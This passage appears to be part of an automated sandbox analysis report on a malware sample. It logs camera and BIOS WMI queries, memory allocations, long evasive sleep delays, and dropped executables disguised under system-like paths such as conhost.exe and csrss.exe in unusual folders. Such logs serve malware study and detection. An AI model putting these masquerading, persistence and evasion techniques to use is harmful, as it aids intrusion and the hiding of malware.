                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeMemory allocated: 1360000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeMemory allocated: 1AF30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: 7B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: 1A240000 memory reserve | memory write watchJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: 1260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: 1B120000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeMemory allocated: 1440000 memory reserve | memory write watch
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeMemory allocated: 1B150000 memory reserve | memory write watch
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeMemory allocated: 1000000 memory reserve | memory write watch
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeMemory allocated: 1210000 memory reserve | memory write watch
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeMemory allocated: 26C0000 memory reserve | memory write watch
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeMemory allocated: 1A6C0000 memory reserve | memory write watch
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeMemory allocated: 3210000 memory reserve | memory write watch
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeMemory allocated: 1B210000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: 8C0000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: 1A440000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: EA0000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: 1AB50000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: DB0000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: 1A940000 memory reserve | memory write watch
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: F90000 memory reserve | memory write watch
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: 1AC00000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: 1540000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: 1B310000 memory reserve | memory write watch
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeMemory allocated: A20000 memory reserve | memory write watch
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeMemory allocated: 1A490000 memory reserve | memory write watch
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeMemory allocated: 2DC0000 memory reserve | memory write watch
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeMemory allocated: 1ADC0000 memory reserve | memory write watch
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: 7A0000 memory reserve | memory write watch
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: 1A4E0000 memory reserve | memory write watch
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 12_2_00007FF848F7CF80 sldt word ptr [eax]12_2_00007FF848F7CF80
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 600000
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599855
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599735
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599594
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599469
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599359
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599250
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599031
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598922
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598812
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598703
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598594
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 3600000
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598484
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598375
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598266
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598016
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597906
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597797
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597688
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597571
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597469
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597359
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597250
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597031
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596922
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596812
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596703
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596594
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596469
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596359
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596250
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596016
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595906
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595797
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595688
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595563
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595438
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595313
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595200
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595093
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 594984
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 594875
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 594766
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 594656
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 594547
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 594438
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 594328
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWindow / User API: threadDelayed 1672
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWindow / User API: threadDelayed 7988
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeDropped PE file which has not been started: C:\Users\user\Desktop\bveMYDWO.logJump to dropped file
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\vnUJHstD.logJump to dropped file
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe TID: 2576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe TID: 4432Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe TID: 2504Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 320Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 2828Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe TID: 7152Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe TID: 4268Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe TID: 2952Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe TID: 3140Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe TID: 5560Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe TID: 3448Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe TID: 2700Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6348Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -27670116110564310s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -599855s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -599735s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -599594s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -599469s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -599359s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -599250s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -599141s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -599031s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -598922s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -598812s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -598703s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -598594s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6844Thread sleep time: -7200000s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -598484s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -598375s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -598266s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -598141s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -598016s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -597906s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -597797s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -597688s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -597571s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -597469s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -597359s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -597250s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -597141s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -597031s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -596922s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -596812s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -596703s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -596594s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -596469s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -596359s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -596250s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -596141s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -596016s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -595906s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -595797s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -595688s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -595563s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -595438s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -595313s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -595200s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -595093s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -594984s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -594875s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -594766s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -594656s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -594547s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -594438s >= -30000s
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe TID: 6148Thread sleep time: -594328s >= -30000s
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe TID: 3836Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe TID: 2956Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 30000
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 600000
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599855
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599735
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599594
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599469
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599359
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599250
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599031
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598922
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598812
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598703
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598594
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 3600000
